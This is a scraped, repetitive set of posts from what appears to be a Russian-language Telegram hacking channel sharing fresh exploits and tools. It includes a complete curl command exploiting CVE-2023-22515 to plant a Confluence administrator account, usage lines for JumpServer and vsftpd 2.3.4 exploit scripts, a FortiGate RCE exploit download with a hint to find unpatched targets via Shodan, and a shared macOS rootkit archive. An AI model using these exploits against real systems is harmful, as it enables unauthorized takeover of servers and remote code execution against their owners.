CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
login - adm1n/adm1n
Почитать как это работает
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1n
Почитать как это работает
🔥14😱6👍2
Proxy Bar
Photo
берут на вооружение )))
ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers
#hideIP #hex #16bit
ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers
#hideIP #hex #16bit
CVE-2023-42820
Дырка в JumpServer (opensource хост-бастион)
Usage:
Дырка в JumpServer (opensource хост-бастион)
Usage:
python CVE-2023-42820.py -t http://IP:Port -e email -u usernameThis media is not supported in your browser
VIEW IN TELEGRAM
CVE-2023-27997 FortiGate
Разбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPN
Скачать - exploit
Дырке 3 месяца - сколько успело проПатчиться расскажет shodan
#fortigate #rce
Разбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPN
Скачать - exploit
Дырке 3 месяца - сколько успело проПатчиться расскажет shodan
#fortigate #rce
👍15
АНБ (National Security Agency, NSA) не спит ! И мы не будем.
Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли.
Сегодня выкатили репозиторий ELITEWOLF.
В котором плавают различные сигнатуры и аналитика, ориентированные на
update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть )))
#NSA
Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли.
Сегодня выкатили репозиторий ELITEWOLF.
В котором плавают различные сигнатуры и аналитика, ориентированные на
ICS/SCADA/OT.
Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть )))
#NSA
👍19😱2
🔥17👍7😱5
MacOS_RootKit.tar.lzma
24.8 MB
macOS RootKit
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
👍10
vsftpd_exploit.py
1.8 KB
vsftpd (для версии 2.3.4)
usage:
usage:
python3 vsftpd_exploit.py <IP address> <port> <command>🔥19😱5👍1